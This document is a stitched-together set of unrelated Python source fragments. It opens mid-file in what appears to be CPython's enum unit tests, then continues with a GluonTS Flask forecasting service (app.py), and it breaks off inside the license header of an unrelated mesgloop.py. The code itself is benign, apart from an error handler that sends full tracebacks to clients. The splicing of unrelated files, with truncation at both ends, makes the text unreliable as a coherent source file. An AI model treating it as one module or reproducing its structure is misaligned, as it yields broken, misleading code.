self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programmatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programmatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_bizarre(self):
with self.assertRaisesRegex(TypeError, "invalid Flag 'Bizarre' -- missing values: 1, 2"):
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that exactly 248 composite members were created (the 256
# values seen include the 8 canonical members)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is not a sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is not a dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is not a private name?' % name)
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?' % name)
class TestEnumTypeSubclassing(unittest.TestCase):
pass
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the lexicographically first name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.IntEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_TEST_'))
self.assertEqual(repr(test_type.CONVERT_TEST_NAME_A), '%s.CONVERT_TEST_NAME_A' % module)
self.assertEqual(str(test_type.CONVERT_TEST_NAME_A), 'CONVERT_TEST_NAME_A')
self.assertEqual(format(test_type.CONVERT_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.StrEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % module)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
app.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import json
import logging
import os
import signal
import time
import traceback
import multiprocessing as mp
from queue import Empty as QueueEmpty
from typing import Callable, Iterable, List, Tuple
from flask import Flask, Response, jsonify, request
from pydantic import BaseModel
from gluonts.dataset.common import ListDataset
from gluonts.model.forecast import Config as ForecastConfig
from gluonts.shell.util import forecaster_type_by_name
from .util import jsonify_floats
logger = logging.getLogger("gluonts.serve")
class InferenceRequest(BaseModel):
instances: list
configuration: ForecastConfig
class ThroughputIter:
def __init__(self, iterable: Iterable) -> None:
self.iter = iter(iterable)
self.timings: List[float] = []
def __iter__(self):
try:
while True:
start = time.time()
element = next(self.iter)
self.timings.append(time.time() - start)
yield element
except StopIteration:
return None
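# Example (a small sketch): ThroughputIter wraps any iterable and records
# the wall-clock time spent producing each element.
#
#     it = ThroughputIter(range(3))
#     total = sum(it)            # consuming the iterator fills it.timings
#     assert len(it.timings) == 3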
def log_throughput(instances, timings):
item_lengths = [len(item["target"]) for item in instances]
if timings:
total_time = sum(timings)
avg_time = total_time / len(timings)
logger.info(
"Inference took "
f"{total_time:.2f}s for {len(timings)} items, "
f"{avg_time:.2f}s on average."
)
for idx, (duration, input_length) in enumerate(
zip(timings, item_lengths), start=1
):
logger.info(
f"\t{idx} took -> {duration:.2f}s (len(target)=={input_length})."
)
else:
logger.info(
"No items were provided for inference. No throughput to log."
)
def get_base_app(execution_params):
app = Flask("GluonTS scoring service")
@app.errorhandler(Exception)
def handle_error(error) -> Tuple[str, int]:
return traceback.format_exc(), 500
@app.route("/ping")
def ping() -> str:
return ""
@app.route("/execution-parameters")
def execution_parameters() -> Response:
return jsonify(execution_params)
return app
def handle_predictions(predictor, instances, configuration):
# create the forecasts
forecasts = ThroughputIter(
predictor.predict(
ListDataset(instances, predictor.freq),
num_samples=configuration.num_samples,
)
)
predictions = [
forecast.as_json_dict(configuration) for forecast in forecasts
]
log_throughput(instances, forecasts.timings)
return predictions
def inference_invocations(predictor_factory) -> Callable[[], Response]:
def invocations() -> Response:
predictor = predictor_factory(request.json)
req = InferenceRequest.parse_obj(request.json)
predictions = handle_predictions(
predictor, req.instances, req.configuration
)
return jsonify(predictions=jsonify_floats(predictions))
return invocations
def do(fn, args, queue):
queue.put(fn(*args))
def with_timeout(fn, args, timeout):
queue = mp.Queue()
process = mp.Process(target=do, args=(fn, args, queue))
process.start()
try:
return queue.get(True, timeout=timeout)
except QueueEmpty:
os.kill(process.pid, signal.SIGKILL)
return None
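# Example (a sketch; `slow` is a hypothetical function, and under the
# spawn start method it must be importable by the child process):
#
#     def slow(x):
#         time.sleep(10)
#         return x
#
#     with_timeout(slow, args=(1,), timeout=0.5)   # None; child is killed
#     with_timeout(abs, args=(-2,), timeout=5.0)   # 2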
def make_predictions(predictor, dataset, configuration):
DEBUG = configuration.dict().get("DEBUG")
# take the initial start time here: predictor.predict is lazy, so the
# first forecast is only produced once the loop below starts iterating
start = time.time()
predictions = []
forecast_iter = predictor.predict(
dataset, num_samples=configuration.num_samples,
)
for forecast in forecast_iter:
end = time.time()
prediction = forecast.as_json_dict(configuration)
if DEBUG:
prediction["debug"] = {"timing": end - start}
predictions.append(prediction)
start = time.time()
return predictions
def batch_inference_invocations(
predictor_factory, configuration, settings
) -> Callable[[], Response]:
predictor = predictor_factory({"configuration": configuration.dict()})
scored_instances = []
last_scored = [time.time()]
def invocations() -> Response:
request_data = request.data.decode("utf8").strip()
# request_data can be empty, but splitting an empty string on "\n"
# still produces a non-empty list, and decoding the resulting empty
# string would then fail: `''.split("\n") == ['']`
if request_data:
instances = list(map(json.loads, request_data.split("\n")))
else:
instances = []
dataset = ListDataset(instances, predictor.freq)
if settings.gluonts_batch_timeout > 0:
predictions = with_timeout(
make_predictions,
args=(predictor, dataset, configuration),
timeout=settings.gluonts_batch_timeout,
)
# predictions is None when the predictor timed out
if predictions is None:
logger.warning(f"predictor timed out for: {request_data}")
FallbackPredictor = forecaster_type_by_name(
settings.gluonts_batch_fallback_predictor
)
fallback_predictor = FallbackPredictor(
freq=predictor.freq,
prediction_length=predictor.prediction_length,
)
predictions = make_predictions(
fallback_predictor, dataset, configuration
)
else:
predictions = make_predictions(predictor, dataset, configuration)
scored_instances.append(len(predictions))
N = 60
diff = time.time() - last_scored[0]
if diff > N:
logger.info(
f"Worker {os.getpid()} Scored {sum(scored_instances)} in last "
f"{int(diff)} seconds."
)
scored_instances.clear()
last_scored[0] = time.time()
lines = list(map(json.dumps, map(jsonify_floats, predictions)))
return Response("\n".join(lines), mimetype="application/jsonlines")
return invocations
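# Example request body for the batch `/invocations` endpoint above: one
# JSON object per line (application/jsonlines), each following the usual
# GluonTS ListDataset conventions (the field values are illustrative):
#
#     {"start": "2020-01-01 00:00:00", "target": [1.0, 2.0, 3.0]}
#     {"start": "2020-01-01 00:00:00", "target": [4.0, 5.0, 6.0]}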
def make_app(
predictor_factory, execution_params, batch_transform_config, settings
):
app = get_base_app(execution_params)
if batch_transform_config is not None:
invocations_fn = batch_inference_invocations(
predictor_factory, batch_transform_config, settings
)
else:
invocations_fn = inference_invocations(predictor_factory)
app.route("/invocations", methods=["POST"])(invocations_fn)
return app
|
mesgloop.py
|
# Copyright (c) 2010-2017 Bo Lin
# Copyright (c) 2010-2017 Yanhong Annie Liu
# Copyright (c) 2010-2017 Stony Brook University
# Copyright (c) 2010-2017 The Research Foundation of SUNY
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
